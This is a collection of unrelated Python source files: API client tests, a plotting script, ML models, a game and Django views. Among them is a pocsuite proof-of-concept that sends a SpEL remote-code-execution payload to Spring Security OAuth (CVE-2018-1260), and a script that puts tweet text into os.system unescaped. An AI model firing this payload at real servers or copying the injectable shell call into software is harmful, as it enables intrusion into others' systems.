request.json()\n return raw_result\n\n requests_mock.patch(f'{toloka_url}/pools/21', json=pools)\n\n # Request object syntax\n result = toloka_client.patch_pool('21', client.pool.PoolPatchRequest(priority=42))\n assert raw_result == client.unstructure(result)\n\n # Expanded syntax\n result = toloka_client.patch_pool('21', priority=42)\n assert raw_result == client.unstructure(result)\n\n\n@pytest.fixture\ndef open_pool_operation_map():\n return {\n 'id': 'open-pool-op1id',\n 'type': 'POOL.OPEN',\n 'status': 'RUNNING',\n 'submitted': '2016-03-07T15:47:00',\n 'started': '2016-03-07T15:47:21',\n 'parameters': {'pool_id': '21'},\n }\n\n\n@pytest.fixture\ndef complete_open_pool_operation_map(open_pool_operation_map):\n return {\n **open_pool_operation_map,\n 'status': 'SUCCESS',\n 'finished': '2016-03-07T15:48:03',\n }\n\n\ndef test_open_pool_async(requests_mock, toloka_client, toloka_url, open_pool_operation_map, complete_open_pool_operation_map):\n requests_mock.post(f'{toloka_url}/pools/21/open', json=open_pool_operation_map, status_code=202)\n requests_mock.get(f'{toloka_url}/operations/{open_pool_operation_map[\"id\"]}', json=complete_open_pool_operation_map, status_code=200)\n\n operation = toloka_client.open_pool_async('21')\n assert open_pool_operation_map == client.unstructure(operation)\n\n complete_operation = toloka_client.wait_operation(operation)\n assert complete_open_pool_operation_map == client.unstructure(complete_operation)\n\n\ndef test_open_pool(requests_mock, toloka_client, toloka_url,\n open_pool_operation_map, complete_open_pool_operation_map, pool_map_with_readonly):\n requests_mock.post(f'{toloka_url}/pools/21/open', json=open_pool_operation_map, status_code=202)\n requests_mock.get(f'{toloka_url}/operations/{open_pool_operation_map[\"id\"]}', json=complete_open_pool_operation_map, status_code=200)\n requests_mock.get(f'{toloka_url}/pools/21', json=pool_map_with_readonly, status_code=200)\n\n result = toloka_client.open_pool('21')\n assert pool_map_with_readonly == client.unstructure(result)\n\n\n@pytest.mark.xfail(reason='Pseudo operations are not supported yet')\ndef test_open_pool_already_open(requests_mock, toloka_client, toloka_url):\n requests_mock.post(f'{toloka_url}/pools/21/open', [{'status_code': 204}])\n result = toloka_client.wait_operation(toloka_client.open_pool_async('21'))\n result.is_completed()\n result.is_pseudo()\n\n\n@pytest.fixture\ndef close_pool_operation_map():\n return {\n 'id': 'close-pool-op1id',\n 'type': 'POOL.CLOSE',\n 'status': 'RUNNING',\n 'submitted': '2016-07-22T13:04:00',\n 'started': '2016-07-22T13:04:01',\n 'finished': '2016-07-22T13:04:02',\n 'parameters': {'pool_id': '21'},\n }\n\n\n@pytest.fixture\ndef complete_close_pool_operation_map(close_pool_operation_map):\n return {\n **close_pool_operation_map,\n 'status': 'SUCCESS',\n }\n\n\ndef test_close_pool_async(requests_mock, toloka_client, toloka_url, complete_close_pool_operation_map):\n requests_mock.post(f'{toloka_url}/pools/21/close', json=complete_close_pool_operation_map, status_code=202)\n result = toloka_client.wait_operation(toloka_client.close_pool_async('21'))\n assert complete_close_pool_operation_map == client.unstructure(result)\n\n\ndef test_close_pool(requests_mock, toloka_client, toloka_url,\n close_pool_operation_map, complete_close_pool_operation_map, pool_map_with_readonly):\n requests_mock.post(f'{toloka_url}/pools/21/close', json=close_pool_operation_map, status_code=202)\n requests_mock.get(f'{toloka_url}/operations/{close_pool_operation_map[\"id\"]}', json=complete_close_pool_operation_map, status_code=200)\n requests_mock.get(f'{toloka_url}/pools/21', json=pool_map_with_readonly, status_code=200)\n\n result = toloka_client.close_pool('21')\n assert pool_map_with_readonly == client.unstructure(result)\n\n\n@pytest.fixture\ndef close_for_update_pool_operation_map():\n return {\n 'id': 'close-pool-for-update-op1id',\n 'type': 'POOL.CLOSE',\n 'status': 'RUNNING',\n 'submitted': '2016-07-22T13:04:00',\n 'started': '2016-07-22T13:04:01',\n 'finished': '2016-07-22T13:04:02',\n 'parameters': {'pool_id': '21'},\n }\n\n\n@pytest.fixture\ndef complete_close_for_update_pool_operation_map(close_for_update_pool_operation_map):\n return {\n **close_for_update_pool_operation_map,\n 'status': 'SUCCESS',\n }\n\n\ndef test_close_pool_for_update_async(requests_mock, toloka_client, toloka_url,\n complete_close_for_update_pool_operation_map):\n requests_mock.post(\n f'{toloka_url}/pools/21/close-for-update',\n json=complete_close_for_update_pool_operation_map,\n status_code=202\n )\n result = toloka_client.wait_operation(toloka_client.close_pool_for_update_async('21'))\n assert complete_close_for_update_pool_operation_map == client.unstructure(result)\n\n\ndef test_close_pool_for_update(requests_mock, toloka_client, toloka_url,\n close_for_update_pool_operation_map, complete_close_for_update_pool_operation_map,\n pool_map_with_readonly):\n requests_mock.post(\n f'{toloka_url}/pools/21/close-for-update',\n json=close_for_update_pool_operation_map,\n status_code=202\n )\n requests_mock.get(\n f'{toloka_url}/operations/{close_for_update_pool_operation_map[\"id\"]}',\n json=complete_close_for_update_pool_operation_map,\n status_code=200\n )\n requests_mock.get(f'{toloka_url}/pools/21', json=pool_map_with_readonly, status_code=200)\n\n result = toloka_client.close_pool_for_update('21')\n assert pool_map_with_readonly == client.unstructure(result)\n\n\n@pytest.fixture\ndef archive_pool_operation_map():\n return {\n 'id': 'archive-pool-op1id',\n 'type': 'POOL.ARCHIVE',\n 'status': 'RUNNING',\n 'submitted': '2016-07-22T13:04:00',\n 'started': '2016-07-22T13:04:01',\n 'finished': '2016-07-22T13:04:02',\n 'parameters': {'pool_id': '21'},\n }\n\n\n@pytest.fixture\ndef complete_archive_pool_operation_map(archive_pool_operation_map):\n return {\n **archive_pool_operation_map,\n 'status': 'SUCCESS',\n }\n\n\ndef test_archive_pool_async(requests_mock, toloka_client, toloka_url, complete_archive_pool_operation_map):\n requests_mock.post(f'{toloka_url}/pools/21/archive', json=complete_archive_pool_operation_map, status_code=202)\n result = toloka_client.wait_operation(toloka_client.archive_pool_async('21'))\n assert complete_archive_pool_operation_map == client.unstructure(result)\n\n\ndef test_archive_pool(requests_mock, toloka_client, toloka_url,\n archive_pool_operation_map, complete_archive_pool_operation_map, pool_map_with_readonly):\n requests_mock.post(f'{toloka_url}/pools/21/archive', json=archive_pool_operation_map, status_code=202)\n requests_mock.get(\n f'{toloka_url}/operations/{archive_pool_operation_map[\"id\"]}',\n json=complete_archive_pool_operation_map,\n status_code=200\n )\n requests_mock.get(f'{toloka_url}/pools/21', json=pool_map_with_readonly, status_code=200)\n\n result = toloka_client.archive_pool('21')\n assert pool_map_with_readonly == client.unstructure(result)\n\n\n@pytest.fixture\ndef clone_pool_operation_map():\n return {\n 'id': 'archive-pool-op1id',\n 'type': 'POOL.CLONE',\n 'status': 'RUNNING',\n 'submitted': '2016-07-22T13:04:00',\n 'started': '2016-07-22T13:04:01',\n 'finished': '2016-07-22T13:04:02',\n 'parameters': {'pool_id': '21'},\n }\n\n\n@pytest.fixture\ndef complete_clone_pool_operation_map(clone_pool_operation_map):\n return {\n **clone_pool_operation_map,\n 'status': 'SUCCESS',\n 'details': {'pool_id': '22'},\n }\n\n\n@pytest.fixture\ndef cloned_pool_map(pool_map_with_readonly):\n return {\n **pool_map_with_readonly,\n 'id': '22',\n }\n\n\ndef test_clone_pool_async(requests_mock, toloka_client, toloka_url, complete_clone_pool_operation_map):\n requests_mock.post(f'{toloka_url}/pools/21/clone', json=complete_clone_pool_operation_map, status_code=202)\n result = toloka_client.wait_operation(toloka_client.clone_pool_async('21'))\n assert complete_clone_pool_operation_map == client.unstructure(result)\n\n\ndef test_clone_pool(requests_mock, toloka_client, toloka_url,\n clone_pool_operation_map, complete_clone_pool_operation_map, cloned_pool_map, caplog):\n requests_mock.post(f'{toloka_url}/pools/21/clone', json=clone_pool_operation_map, status_code=202)\n requests_mock.get(\n f'{toloka_url}/operations/{clone_pool_operation_map[\"id\"]}',\n json=complete_clone_pool_operation_map,\n status_code=200\n )\n requests_mock.get(f'{toloka_url}/pools/22', json=cloned_pool_map, status_code=200)\n\n with caplog.at_level(logging.INFO):\n caplog.clear()\n result = toloka_client.clone_pool('21')\n assert caplog.record_tuples == [(\n 'toloka.client',\n logging.INFO,\n 'A new pool with ID \"22\" has been cloned. Link to open in web interface: https://sandbox.toloka.yandex.com/requester/project/10/pool/22'\n )]\n assert cloned_pool_map == client.unstructure(result)\n","sub_path":"tests/pool/test_pool.py","file_name":"test_pool.py","file_ext":"py","file_size_in_byte":20586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"377155861","text":"import matplotlib.pyplot as plt\nfrom sklearn.metrics import roc_curve, auc\nimport numpy as np\n\ndef bar_charts():\n plt.style.use('seaborn')\n\n labels = ['DSC (original)', 'MLP100', 'MLP20', 'MLPLinear']\n values = np.array([0.899, 0.900, 0.855, 0.505]) - 0.5\n vlabels = ['0.899', '0.900', '0.855', '0.505']\n\n use_inverse_ws = True\n if not use_inverse_ws:\n nweights = [0.5, 1/400, 1/2000, 1/2000]\n wlabels = ['20,000', '100', '20', '20']\n else:\n # progression to arrive at the final numbers\n # 1/20000, 1/100, 1/20, 1/20\n # 1/1000, 1/5, 1, 1 -- scale to 1\n # 1/2000, 1/10, 0.5, 0.5 -- scale to 0.5\n nweights = [1/2000, 1/10, 0.5, 0.5]\n wlabels = ['1/20,000', '1/100', '1/20', '1/20']\n\n x = np.arange(len(labels)) # the label locations\n width = 0.35 # the width of the bars\n width2 = 0.2\n\n fig, ax = plt.subplots()\n rects1 = ax.bar(x - width / 2, values, width, label='AUC')\n rects2 = ax.bar(x + width2 / 2, nweights, width2, label='Inverse number of weights')\n\n # Add some text for labels, title and custom x-axis tick labels, etc.\n # ax.set_ylabel('Scores')\n # plt.yticks([], [])\n # ax.set_yticks([], minor=True)\n # plt.yticks([])\n # ax.axes.get_yaxis().set_visible(False)\n yticks = [item.get_text() for item in ax.get_yticklabels()]\n\n ax.set_yticklabels(['']*len(yticks))\n ax.set_title('AUC and inverse number of weights by model')\n ax.set_xticks(x)\n ax.set_xticklabels(labels)\n ax.legend()\n\n def autolabel(rects, labels=None):\n \"\"\"Attach a text label above each bar in *rects*, displaying its height.\"\"\"\n for i, rect in enumerate(rects):\n label = labels[i] if labels else rect.get_height()\n height = rect.get_height()\n if label == '1/20,000': continue\n ax.annotate(f'{label}',\n xy=(rect.get_x() + rect.get_width() / 2, height),\n xytext=(0, 3), # 3 points vertical offset\n textcoords=\"offset points\",\n ha='center', va='bottom')\n autolabel(rects1, vlabels)\n autolabel(rects2, wlabels)\n dscwrect = rects2[0]\n dscwrect_height = dscwrect.get_height()\n ax.annotate(f'1/20,000',\n xy=(dscwrect.get_x() + dscwrect.get_width()-0.05, dscwrect_height),\n xytext=(0, 3), # 3 points vertical offset\n textcoords=\"offset points\",\n ha='center', va='bottom')\n # values = [0.899, 1, 0.900, 1/200, 0.855, 1/1000, 0.498, 1/1000]\n # xs = range(4)\n # labels = ['DSC (original)', 'MLP100', 'MLP20', 'MLPLinear']\n # plt.bar(xs, values)#, tick_label=labels)\n # plt.xticks(xs, labels)\n fig.tight_layout()\n plt.savefig('dsc_funeral_barchart.png', dpi=300, bbox_inches='tight')\n plt.show()\n\nif __name__ == '__main__':\n bar_charts()","sub_path":"visualizations/ch5-results/funeral_visualizations.py","file_name":"funeral_visualizations.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"251380967","text":"# python3\n# Copyright 2018 DeepMind Technologies Limited. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Tests for actors_jax.\"\"\"\n\nfrom absl.testing import absltest\n\nfrom acme import environment_loop\nfrom acme import specs\nfrom acme.agents import actors_jax\nfrom acme.testing import fakes\nfrom acme.utils import jax_utils\nfrom acme.utils import jax_variable_utils\n\nimport dm_env\nimport haiku as hk\nimport jax.numpy as jnp\nimport numpy as np\n\n\ndef _make_fake_env() -> dm_env.Environment:\n env_spec = specs.EnvironmentSpec(\n observations=specs.Array(shape=(10, 5), dtype=np.float32),\n actions=specs.DiscreteArray(num_values=3),\n rewards=specs.Array(shape=(), dtype=np.float32),\n discounts=specs.BoundedArray(\n shape=(), dtype=np.float32, minimum=0., maximum=1.),\n )\n return fakes.Environment(env_spec, episode_length=10)\n\n\nclass ActorTest(absltest.TestCase):\n\n def test_feedforward(self):\n environment = _make_fake_env()\n env_spec = specs.make_environment_spec(environment)\n\n def policy(inputs: jnp.ndarray):\n return hk.Sequential([\n hk.Flatten(),\n hk.Linear(env_spec.actions.num_values),\n lambda x: jnp.argmax(x, axis=-1),\n ])(\n inputs)\n\n policy = hk.transform(policy, apply_rng=True)\n\n rng = hk.PRNGSequence(1)\n dummy_obs = jax_utils.add_batch_dim(\n jax_utils.zeros_like(env_spec.observations))\n params = policy.init(next(rng), dummy_obs)\n\n variable_source = fakes.VariableSource(params)\n variable_client = jax_variable_utils.VariableClient(variable_source,\n 'policy')\n\n actor = actors_jax.FeedForwardActor(\n policy.apply, rng=hk.PRNGSequence(1), variable_client=variable_client)\n\n loop = environment_loop.EnvironmentLoop(environment, actor)\n loop.run(20)\n\n\nif __name__ == '__main__':\n absltest.main()\n","sub_path":"acme/agents/actors_jax_test.py","file_name":"actors_jax_test.py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"22937891","text":"#!/home/ludflu/project/tweet-talk/tt-python/bin/python\n\nimport twitter\nimport os\n\niconsumer_key = 'XX'\niconsumer_secret = 'XX'\niaccess_token = 'XX'\niaccess_token_secret ='XX'\n\napi = twitter.Api(consumer_key=iconsumer_key,\n consumer_secret=iconsumer_secret,\n access_token_key=iaccess_token,\n access_token_secret=iaccess_token_secret)\n\nstatuses = api.GetUserTimeline('ludflu')\n\ns= statuses[0]\n\ntweet = 'echo \"' + s.text + '\" | festival --tts'\nos.system( tweet )\n\n","sub_path":"tt.py","file_name":"tt.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"652876117","text":"# -*- coding: utf-8 -*-\n'''\nurl:https://kexue.fm/archives/3863\nword embedding测试\n在GTX960上,18s一轮\n经过30轮迭代,训练集准确率为98.41%,测试集准确率为89.03%\nDropout不能用太多,否则信息损失太严重\n'''\n\nimport numpy as np\nimport pandas as pd\nimport jieba\n\npos = pd.read_excel('./pos.xls', header=None)\npos['label'] = 1\nneg = pd.read_excel('neg.xls', header=None)\nneg['label'] = 0\nall_ = pos.append(neg, ignore_index=True)\nall_['words'] = all_[0].apply(lambda s: list(jieba.cut(s))) #调用结巴分词\nprint(all_[\"words\"][0:2])\n\nmaxlen = 100 #截断词数\nmin_count = 5 #出现次数少于该值的词扔掉。这是最简单的降维方法\n\ncontent = []\n# 把结巴分词得到的所有分词结果合并到一个 list 中\nfor i in all_['words']:\n\tcontent.extend(i)\n\n# 统计合并分词结果的list中各值出现的次数,此时结果Series包含两部分,一部分是index,一部分是values\n# 其中 word 为index,word_count为value\nabc = pd.Series(content).value_counts()\n# 过滤掉出现次数在阈值以下的数据\nabc = abc[abc >= min_count]\n# 将完成过滤得结果按出现次数的大小排序,出现次数最大的1,第二大的2。。。\nabc[:] = list(range(1, len(abc)+1))\n# 添加空字符串用来截断词数时补全\nabc[''] = 0\nword_set = set(abc.index)\n\ndef doc2num(s, maxlen):\n s = [i for i in s if i in word_set]\n # 过滤掉出现次数小于5的单词,并统一到截断个数(不够时补全'')\n # [1, 2, '', '']\n s = s[:maxlen] + ['']*max(0, maxlen-len(s))\n # 用word作索引,返回这个单词的出现次数\n return list(abc[s])\n\nall_['doc2num'] = all_['words'].apply(lambda s: doc2num(s, maxlen))\nprint(all_['doc2num'][0:2])\n\n#手动打乱数据\n#print(all_['doc2num'][0:10])\nidx = list(range(len(all_)))\nnp.random.shuffle(idx)\n# loc通过行标签获取数据\nall_ = all_.loc[idx]\n#print(all_['doc2num'][0:10])\n\n# 按keras的输入要求来生成数据\nx = np.array(list(all_['doc2num']))\nprint(x[0:2])\ny = np.array(list(all_['label']))\n# 调整标签形状,由一维数组变成二维数组 [0 1 0 1] [[0] [1] [0] [1]]\n# -1 reshape函数会根据另一个参数的维度计算出数组的另外一个shape属性值\ny = y.reshape((-1, 1))\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, Dropout, Embedding\nfrom keras.layers import LSTM\n\n#建立模型\nmodel = Sequential()\n# Embedding层如何应用word2vec的解释:https://blog.csdn.net/jiangpeng59/article/details/77533309\n# 输入shape 形如(samples,sequence_length)的2D张量。及batch_size个样本,每个样本由input_length个单词构成\n# 输出shape 形如(samples, sequence_length, output_dim)的3D张量。及batch_size个样本,每个样本是一个2D张量,\n# 一个维度为单词,另一个维度为表示该单词的Embedding特征数。\nmodel.add(Embedding(len(abc), 256, input_length=maxlen))\n# LSTM各个参数的解释,还有一个图例说明 https://blog.csdn.net/jiangpeng59/article/details/77646186\n# 可以把很多的LSTM层串在一起,但是最后一个LSTM层通常return_sequences为False。\n# 形如(samples,timesteps,input_dim)的3D张量\n# 如果return_sequences=True:返回形如(samples,timesteps,output_dim)的3D张量\n# 否则,返回形如(samples,output_dim)的2D张量\nmodel.add(LSTM(128))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(1))\nmodel.add(Activation('sigmoid'))\nprint(\"包含模型网络层的展平列表\")\nprint(model.layers)\nprint(\"模型输入张量的列表\")\nprint(model.inputs)\nprint(\"模型输出张量的列表\")\nprint(model.outputs)\nprint(\"模型概述信息\")\nmodel.summary()\nmodel.compile(loss='binary_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\n\nbatch_size = 128\ntrain_num = 15000\n\n# verbose默认为1,打印学习过程中的debug information。关闭则使verbose = 0 即可。\nmodel.fit(x[:train_num], y[:train_num], batch_size = batch_size, epochs=30, verbose=1)\n\nmodel.evaluate(x[train_num:], y[train_num:], batch_size = batch_size)\n\ndef predict_one(s): #单个句子的预测函数\n s = np.array(doc2num(list(jieba.cut(s)), maxlen))\n s = s.reshape((1, s.shape[0]))\n return model.predict_classes(s, verbose=0)[0][0]","sub_path":"EmoClassification/word_embedding.py","file_name":"word_embedding.py","file_ext":"py","file_size_in_byte":4278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"342694607","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom pocsuite.api.request import req #用法和 requests 完全相同\nfrom pocsuite.api.poc import register\nfrom pocsuite.api.poc import Output, POCBase\nheaders = {'user-agent': 'ceshi/0.0.1','content-type': 'text/xml'}\npoc_str = '''oauth/authorize?client_id=client&response_type=code&redirect_uri=http://www.github.com/chybeta&scope=%24%7BT%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22calc.exe%22%29%7D'''\ndef poc(url):\n if not url.startswith(\"http\"):\n url = \"http://\" + url\n if \"/\" in url:\n url += poc_str\n try:\n res = req.get(url, verify=False, timeout=5, headers=headers)\n response = res.text\n except Exception:\n response = \"\"\n return response\n\nclass TestPOC(POCBase):\n name = 'spring_security_oauth_RCE-2018-1260'\n vulID = 'CVE-2018-1260' #https://www.seebug.org/vuldb/ssvid-97287\n author = ['debug']\n vulType = 'RCE' \n version = '1.0' # default version: 1.0\n references = ['https://www.codercto.com/a/20129.html']\n desc = '''\n\t\t Spring Security OAuth,2.3.3之前的2.3版和2.2.2之前的2.2和2.1.2之前的2.1和2.0.15之前的2.0以及较旧的\n 不受支持的版本包含一个远程代码执行漏洞。恶意用户或攻击者可以向授权端点提出授权请求,\n 当资源所有者转发到批准端点时,授权请求可能导致远程执行代码。\n\t\t '''\n vulDate = '2020-02-10'\n createDate = '2020-02-10'\n updateDate = '2020-02-13'\n appName = 'Spring Security OAuth'\n appVersion = '2.3 to 2.3.3,2.2 to 2.2.2,2.0 to 2.0.152.1 to 2.1.2'\n appPowerLink = ''\n samples = ['']\n \n def _attack(self):\n '''attack mode'''\n return self._verify()\n\n def _verify(self):\n '''verify mode'''\n result={}\n response = poc(self.url)\n if 'Login with Username and Password' in response:\n result['VerifyInfo'] = {}\n result['VerifyInfo']['URL'] = self.url+ 'Spring Security Oauth_RCE-2018-1260' + ' is exist!'\n return self.parse_output(result)\n \n def parse_output(self, result):\n output = Output(self)\n if result:\n output.success(result)\n else:\n output.fail('Internet nothing returned')\n return output\nregister(TestPOC)\n","sub_path":"_pocs/muti/pocs4scan/Spring/Spring_Security_Oauth_RCE-2018-1260.py","file_name":"Spring_Security_Oauth_RCE-2018-1260.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"249444121","text":"#coding:utf-8\nimport os\nimport socket\nfrom win32com.client import Dispatch\nimport random\nimport platform\nimport signal\nimport sys\nimport time\n\nclass server():\n\n pidfile = \"\"\n port = 9999\n\n\n def __init__(self):\n self.pidfile = os.path.dirname(__file__)+\"/pidfile.pid\"\n\n #开启服务\n def start_server(self):\n print('read to start models...')\n\n #写入pid\n pid = os.getpid()\n f = open(self.pidfile,'w')\n f.write(str(pid))\n f.close()\n\n #启动matlab\n matlab = Dispatch('Matlab.application')\n\n #创建socket\n serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n #host = socket.gethostname()\n host = \"0.0.0.0\"\n\n serversocket.bind((host,self.port))\n serversocket.listen(4)\n\n print('service started')\n while True:\n clientsocket, addr = serversocket.accept()\n\n clientsocket.close()\n\n\n #停止服务\n def stop_server(self):\n\n osname = platform.system().lower()\n\n f = open(self.pidfile, 'r')\n pid = f.read()\n\n try:\n\n if osname == 'windows':\n print('killing ps')\n os.popen('taskkill.exe /pid:' + pid + \" -f\")\n print(\"服务已停止\")\n\n else:\n\n a = os.kill(pid, signal.SIGKILL)\n print(\"服务已停止\")\n\n matlab = Dispatch('Matlab.application')\n try:\n\n matlab.execute(\"quit\")\n\n finally:\n pass\n \n\n except OSError:\n\n print(OSError)\n print('服务未启动')\n\n\n #重启服务\n def restart(self):\n self.stop_server()\n self.stop_server()\n\n\n #解析数据\n def get_data(self,result):\n\n data = {}\n result = result.split(\"&\")\n\n for i in result:\n result1 = i.split(\"=\")\n data[result1[0]] = result1[1]\n\n return data\n\n","sub_path":"app/python/matlabserver.py","file_name":"matlabserver.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"53375728","text":"################################################\r\n#\r\n# Program created by Peter Nguyen and Alexis Torres\r\n# Date: 11/30/19\r\n# Description: This program simulates the space invaders\r\n# game using pygame functions and modules from other files.\r\n# Modules used: Sound.py, Mob.py\r\n#\r\n################################################\r\n\r\n# libraries imported\r\nimport pygame\r\nimport random # random chance\r\nimport math # for calculating distance\r\nfrom pygame import mixer # for music functions\r\n#from Mob import player, obj\r\nimport Mob\r\nimport Sound\r\n\r\n################################################\r\n# initialize the pygame\r\n\r\npygame.init()\r\n################################################\r\n# width and length of game screen\r\nwidth = 800\r\nlength = 600\r\n\r\n################################################\r\n# create the screen\r\nscreen = pygame.display.set_mode((width,length))\r\n\r\n################################################\r\n# Sets fps\r\nclock = pygame.time.Clock()\r\n\r\n\r\n################################################\r\n#Title and Icon\r\npygame.display.set_caption(\"Space Invaders\")\r\nicon = pygame.image.load(\"icon.png\")\r\npygame.display.set_icon(icon)\r\n\r\n\r\n\r\n################################################\r\n# background\r\nbackground = Mob.obj('background.png',0,0)\r\nSound.background_music()\r\n\r\n################################################\r\n# Score\r\nfont = pygame.font.Font('freesansbold.ttf',32)\r\ndef show_score(score_value,x,y):\r\n score = font.render(\"Score :\"+ str(score_value), True, (255,255,255))\r\n screen.blit(score, (x,y))\r\n\r\n###############################################\r\n# Gameover text\r\nover_font = pygame.font.Font('freesansbold.ttf',64)\r\n\r\ndef game_over_text():\r\n over_text = over_font.render((\"GAME OVER!!\"), True, (255,255,255))\r\n screen.blit(over_text, (200,250))\r\n \r\n################################################\r\n# player\r\nship = Mob.player('player.png',400,500,0,0)\r\n\r\n################################################\r\n# Enemy\r\nnum_of_enem = 15\r\nenemy = []\r\nfor i in range(num_of_enem):\r\n enemy.append(Mob.enemy('enemy.png',random.randint(0,735),random.randint(50,150),4,40))\r\n\r\n################################################\r\n# bullet\r\nprojectile = Mob.bullet('bullet.png',0,500,0,20)\r\n\r\n################################################\r\n# GAME LOOP\r\ndef main():\r\n score_value = 0\r\n textX = 10\r\n textY = 10\r\n running = True\r\n while running:\r\n #clock.tick(240) # Time frames per second\r\n ########################################\r\n # RGB - red green blue\r\n screen.fill((255,255,255))\r\n # background image\r\n screen.blit(background.image,(0,0))\r\n\r\n ########################################\r\n # check for end of game\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n running = False\r\n\r\n ########################################\r\n # If keystroke is pressed\r\n if event.type == pygame.KEYDOWN:\r\n # left direction\r\n if event.key == pygame.K_LEFT:\r\n ship.X_change = -5\r\n \r\n # right direction\r\n if event.key == pygame.K_RIGHT:\r\n ship.X_change = 5\r\n\r\n # firing bullet\r\n if event.key == pygame.K_SPACE:\r\n # so that bullet finishes its path\r\n if projectile.state is 'ready':\r\n Sound.laser_sound()\r\n projectile.X_coord = ship.X_coord\r\n projectile.fire(screen)\r\n\r\n # releasing key \r\n if event.type == pygame.KEYUP:\r\n # for the ship to stop moving\r\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\r\n ship.X_change = 0\r\n\r\n # movement of ship\r\n ship.X_coord += ship.X_change\r\n\r\n #########################################\r\n # GAME OVER \r\n for i in range(num_of_enem):\r\n if enemy[i].Y_coord > 440:\r\n for j in range(num_of_enem):\r\n enemy[j].Y_coord = 2000\r\n game_over_text()\r\n \r\n if projectile.isCollision(enemy[i]):\r\n enemy[i].hit()\r\n projectile.hit()\r\n Sound.collision_sound()\r\n score_value+=1\r\n \r\n enemy[i].movement(screen)\r\n enemy[i].X_coord += enemy[i].X_change\r\n \r\n # Checks if ship is within the screen boundaries\r\n ship.boundary()\r\n # Updates ship position\r\n ship.update_obj(screen)\r\n # Updates projectile position\r\n projectile.movement(screen)\r\n # Shows score\r\n show_score(score_value,textX, textY)\r\n # Updates whole screen\r\n pygame.display.update()\r\n\r\n\r\n################################################\r\n# Main Function Call\r\nmain()\r\n\r\n \r\n \r\n\r\n","sub_path":"Space_invaders.py","file_name":"Space_invaders.py","file_ext":"py","file_size_in_byte":4895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"525368286","text":"#from django.shortcuts import render\nfrom django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.urls import reverse\n\nfrom .models import Exam, Question, Choice, Tag\n\ndef index(request):\n exam_list = Exam.objects.order_by('-pub_date')\n for exam in exam_list:\n print(exam.exam_name)\n context = {\n 'exam_list':exam_list\n }\n\n return render(request, 'exams/index.html', context)\n\ndef detail(request, exam_id):\n exam = get_object_or_404(Exam, pk=exam_id)\n return render(request, 'exams/detail.html', {'exam':exam})\n\ndef create(request):\n tags = Tag.objects.all()\n sorted(tags, key=lambda tag: tag.tag_text)\n questions = Question.objects.all()\n return render(request, 'exams/create.html', {'tags':tags, 'questions':questions})\n\ndef evaluate(request, exam_id):\n exam = get_object_or_404(Exam, pk=exam_id)\n selected_choices = {}\n\n response = \"Selected choices: \"\n for question in exam.question_set.all():\n try:\n selected_choice = question.choice_set.get(pk=request.POST['question' + str(question.id)])\n except (KeyError, Choice.DoesNotExist):\n choice_id = -1\n else:\n choice_id = selected_choice.id\n\n response += str(choice_id) + \" \"\n selected_choices[question.id] = choice_id\n #reversestr = reverse('exams:results', args=(exam_id,))\n #print(\"reverse \" + reversestr)\n #return render(reversestr)\n\n return results(request, exam_id, selected_choices)\n\ndef results(request, exam_id, selected_choices):\n exam = get_object_or_404(Exam, pk=exam_id)\n correct_count = 0\n total_count = len(exam.question_set.all())\n for question in exam.question_set.all():\n choice_id = selected_choices[question.id]\n if choice_id is not -1 and Choice.objects.get(pk=choice_id).is_correct():\n correct_count += 1\n\n percentage = correct_count / total_count * 100\n return render(request, 'exams/results.html', {'percentage': percentage})\n","sub_path":"src/exams/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"60290792","text":"import math\nimport numpy as np\nfrom copy import deepcopy\nimport re\n\nPOPULATION = 50\nSIZE = [3,9,1]\n\ndef sigmoid(z):\n\tf = lambda x: 0. if x < -500 else 1.0 if x >500 else 1.0/(1.0 + math.exp(-x))\n\tif isinstance(z,(float,int)):\n\t\treturn f(z)\n\telse:\n\t\treturn np.array(list(map(f,z)))\n\nclass NeuroNetwork():\n\tdef __init__(self,size = SIZE):\n\t\tself.num_layers = len(size)\n\t\tself.size = size\n\t\t# without input layer\n\t\t#self.biases = [np.random.randn(y) for y in size[1:]]\n\t\tself.weights = [np.random.randn(y,x)\n\t\t\t\t\t\tfor x,y in zip(size[:-1],size[1:])]\n\n\tdef feedforward(self, a):\n\t\t''' a is the input, could be the position of pipes'''\n\t\ta = a.copy()\n\t\tfor w in self.weights:\n\t\t\ta = sigmoid(np.dot(w,a))\n\t\treturn a\n\nclass individual():\n\t''' an individual is a neruo network'''\n\tdef __init__(self,score,netweights):\n\t\tself.score = score\n\t\tself.netweights = 